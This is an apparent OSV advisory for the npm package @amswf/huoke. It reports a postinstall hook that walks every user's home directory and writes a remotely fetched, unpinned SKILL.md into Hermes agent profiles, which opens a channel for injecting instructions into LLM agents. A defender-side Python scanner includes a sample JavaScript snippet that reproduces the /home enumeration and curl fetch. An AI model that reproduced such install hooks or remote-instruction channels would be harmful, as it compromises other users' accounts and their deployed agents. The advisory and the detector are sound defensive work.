MAL-2026-4361

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@amswf/huoke/MAL-2026-4361.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4361
Withdrawn
2026-05-26T21:14:22Z
Published
2026-05-21T08:20:01Z
Modified
2026-05-27T00:32:01.040636888Z
Summary
Malicious code in @amswf/huoke (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (4ec868ff3c73d920bd9c3b66a0e725f2eaf427b83ade2ad0fae284be0386eff4)

On npm install, this package's postinstall hook runs node bin/huoke.js install-skill. That script enumerates /home/* for every system user, finds each user's ~/.hermes/profiles/* directories, and for each one downloads SKILL.md from https://raw.githubusercontent.com/amswf/huoke/main/SKILL.md via curl -fsSL and writes the response into that user's profile under skills/.

The fetch targets the mutable main branch with no commit pin and no hash or signature verification, and the package ignores the SKILL.md it ships locally in favor of the remote copy. Because Hermes/OpenClaw consumes SKILL.md as agent (LLM) instructions, the maintainer can change its contents at any time after publish and thereby inject new instructions into every installer's deployed agents: an attacker-controlled content channel that requires no republishing of the package.

The write loop also crosses account boundaries: when npm install runs with sufficient privileges (root/sudo, which is common in container images and CI), the package modifies files inside other system users' home directories, which it has no business touching.

Separately, the runtime CLI's default endpoint is plain http://huoke.link, so JWTs and credentials are sent in cleartext. This is a quality issue affecting CLI users, but it is not the basis for this verdict.
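As an added defender-side check, not part of this advisory or of the package, the Python heuristic below flags the three traits described above in a package's files: an install lifecycle hook, a raw.githubusercontent.com fetch at a mutable ref instead of a 40-hex commit, and enumeration of /home. The sample package.json and script are constructed with hypothetical names and are not the real @amswf/huoke files.

```python
import json
import re

# Constructed sample inputs (hypothetical names; not the real @amswf/huoke files).
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-pkg",
    "scripts": {"postinstall": "node bin/install.js install-skill"},
})
SAMPLE_BIN_JS = r'''
const fs = require("fs");
const { execSync } = require("child_process");
for (const user of fs.readdirSync("/home")) {
  const profiles = `/home/${user}/.hermes/profiles`;
  for (const p of fs.readdirSync(profiles)) {
    execSync(`curl -fsSL https://raw.githubusercontent.com/example/repo/main/SKILL.md ` +
             `-o ${profiles}/${p}/skills/SKILL.md`);
  }
}
'''

# raw.githubusercontent.com/<owner>/<repo>/<ref>/<path>; capture <ref>.
RAW_GITHUB = re.compile(r"""raw\.githubusercontent\.com/[^/\s'"`]+/[^/\s'"`]+/([^/\s'"`]+)/""")
COMMIT_SHA = re.compile(r"^[0-9a-f]{40}$")
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")


def audit_package(package_json: str, script_sources: dict) -> list:
    """Return human-readable findings for the traits described in the advisory."""
    findings = []
    scripts = json.loads(package_json).get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        if hook in scripts:
            findings.append(f"package.json: lifecycle hook {hook} runs '{scripts[hook]}'")
    for path, src in script_sources.items():
        for match in RAW_GITHUB.finditer(src):
            ref = match.group(1)
            if not COMMIT_SHA.match(ref):  # branch or tag name, not a pinned commit
                findings.append(f"{path}: fetches raw GitHub content at mutable ref '{ref}'")
        if "/home" in src and "readdir" in src:  # heuristic for cross-user enumeration
            findings.append(f"{path}: enumerates /home (writes may cross account boundaries)")
        if ".hermes/profiles" in src:
            findings.append(f"{path}: touches Hermes agent profiles (SKILL.md is LLM instructions)")
    return findings


if __name__ == "__main__":
    for line in audit_package(SAMPLE_PACKAGE_JSON, {"bin/install.js": SAMPLE_BIN_JS}):
        print(line)
```

A pinned fetch (a 40-hex commit in place of the branch name) produces no "mutable ref" finding, so the check distinguishes an unverifiable channel from a reproducible one.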

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.9.0"
            ],
            "modified_time": "2026-05-21T08:20:01Z",
            "sha256": "358a0c48fb69e1c65e772be88f2150b69fd6e7c5a6a8d3aee16ffc286bc607fd",
            "id": "IN-MAL-2026-003781",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:51:18.088679876Z"
        },
        {
            "versions": [
                "1.9.1"
            ],
            "modified_time": "2026-05-21T08:34:12Z",
            "sha256": "4ec868ff3c73d920bd9c3b66a0e725f2eaf427b83ade2ad0fae284be0386eff4",
            "id": "IN-MAL-2026-003783",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:51:18.31300665Z"
        }
    ]
}
References
Credits

Affected packages

npm / @amswf/huoke

Package

Name
@amswf/huoke
Purl
pkg:npm/%40amswf%2Fhuoke

Affected ranges

Affected versions

1.*
1.9.0
1.9.1

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "package_integrity": [
        {
            "filename": "huoke-1.9.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-ejjPJpaL/zsugfhlii2BdjMVpoc9hjydHRBMflOkSNUMcQxDWRikdab7RYzJcI4BlBqiNfn7+PVwPr6Atk3HTA==",
                "sha1": "5a85071b1aa933df090bc013b9918be73f5c6f0b"
            }
        }
    ],
    "evidence_files": [
        {
            "path": "bin/huoke.js",
            "tlsh": "82c2763418fa24703523e4acab8b60027119f9037449dd5876adb36e5fcda34daa36fd",
            "sha256": "4c45619b6796923309467847c0bc3e5c3d93e7f2c03287cb95212985e9b96d92"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@amswf/huoke/MAL-2026-4361.json"